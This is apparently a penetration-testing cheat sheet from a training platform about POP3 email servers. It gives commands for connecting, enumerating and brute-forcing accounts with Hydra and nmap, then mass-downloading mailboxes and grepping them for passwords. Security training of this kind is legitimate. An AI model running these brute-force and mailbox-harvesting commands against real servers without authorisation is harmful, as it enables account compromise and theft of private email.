Skip to main content

Want to Practice These Techniques?

Try Hackviser's interactive cyber security upskilling platform - Learn by doing!

Start Practicing Now

POP3 (Post Office Protocol)

Default Ports: 110 (POP3), 995 (POP3S)

Post Office Protocol version 3 (POP3) is an email protocol used to retrieve emails from a remote server to a local client. Unlike IMAP, POP3 typically downloads emails to the client and deletes them from the server (though this can be configured). POP3 is simpler than IMAP but less feature-rich, primarily designed for offline email access.

Connect

Using Telnet

# Connect to POP3 server
telnet target.com 110

# Basic POP3 conversation
USER username
PASS password
LIST
RETR 1
QUIT

Using openssl (POP3S)

# Connect with SSL
openssl s_client -connect target.com:995 -crlf -quiet

# POP3 commands
USER username
PASS password
LIST
QUIT

Using curl

# List emails
curl -u username:password pop3://target.com/

# Read specific email
curl -u username:password pop3://target.com/1

# POP3S
curl -u username:password pop3s://target.com/ --insecure

Recon

Service Detection with Nmap

Use Nmap to detect POP3 mail servers and identify server capabilities.

nmap -p 110,995 target.com

Connect to POP3 servers to gather version and service information.

Using netcat

# Using netcat
nc target.com 110

Using telnet

# Using telnet
telnet target.com 110

Using nmap

# Using nmap
nmap -p 110 -sV target.com

Enumeration

Capability Enumeration

POP3 servers advertise their supported features and extensions through the CAPA command.

# Get server capabilities
telnet target.com 110
CAPA

# Response shows:
# +OK Capability list follows
# USER
# PIPELINING
# TOP
# UIDL
# STLS
# .

Mailbox Enumeration

Explore mailbox contents and message information.

# After login
USER username
PASS password

# List messages
LIST

# Message count and size
STAT

# Get message UIDs
UIDL

Attack Vectors

Brute Force

Brute forcing POP3 credentials can reveal weak email account passwords.

Using Hydra

# POP3 (plaintext)
hydra -l user@target.com -P passwords.txt pop3://target.com

# POP3S (SSL/TLS)
hydra -l user@target.com -P passwords.txt pop3s://target.com:995

# Multiple users
hydra -L users.txt -P passwords.txt pop3://target.com

Using Nmap

nmap -p 110 --script pop3-brute target.com

User Enumeration

POP3 doesn't have VRFY/EXPN like SMTP, but you can enumerate via login attempts.

# POP3 doesn't have VRFY/EXPN like SMTP
# But you can enumerate via login attempts

# Different error messages may reveal valid users
telnet target.com 110
USER admin
# +OK vs -ERR can indicate if user exists

# Timing attacks
# Valid users may take longer to respond

Post-Exploitation

Email Download

Download emails from compromised POP3 accounts for analysis.

Automated Email Download

# Download all emails with curl
for i in {1..100}; do
curl -u username:password "pop3://target.com/$i" > email_$i.eml 2>/dev/null
done

Manual Email Retrieval

# Or using telnet
telnet target.com 110
USER username
PASS password
STAT # Get message count
RETR 1 # Retrieve first email
RETR 2 # Second email

Credential Harvesting

Extract sensitive information from downloaded emails.

# Search downloaded emails for credentials
grep -r "password\|credential\|username" *.eml

# Extract URLs
grep -Eiorh 'https?://[^\s]+' *.eml

# Extract email addresses
grep -Eiorh '\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b' *.eml

Common POP3 Commands

CommandDescriptionUsage
USERUsernameUSER username
PASSPasswordPASS password
STATMailbox statsSTAT
LISTList messagesLIST
RETRRetrieve messageRETR 1
DELEMark for deletionDELE 1
NOOPNo operationNOOP
RSETResetRSET
TOPMessage header + linesTOP 1 10
UIDLUnique IDsUIDL
QUITClose connectionQUIT

Useful Tools

ToolDescriptionPrimary Use Case
telnetTerminal clientManual testing
openssl s_clientSSL/TLS clientPOP3S connection
curlTransfer toolAutomated access
HydraPassword crackerBrute force
NmapNetwork scannerService detection
MetasploitExploitation frameworkAutomated testing

Security Misconfigurations

  • ❌ No encryption (port 110)
  • ❌ Weak passwords
  • ❌ No rate limiting
  • ❌ Plaintext authentication
  • ❌ No account lockout
  • ❌ Outdated server software
  • ❌ No TLS enforcement
  • ❌ Information disclosure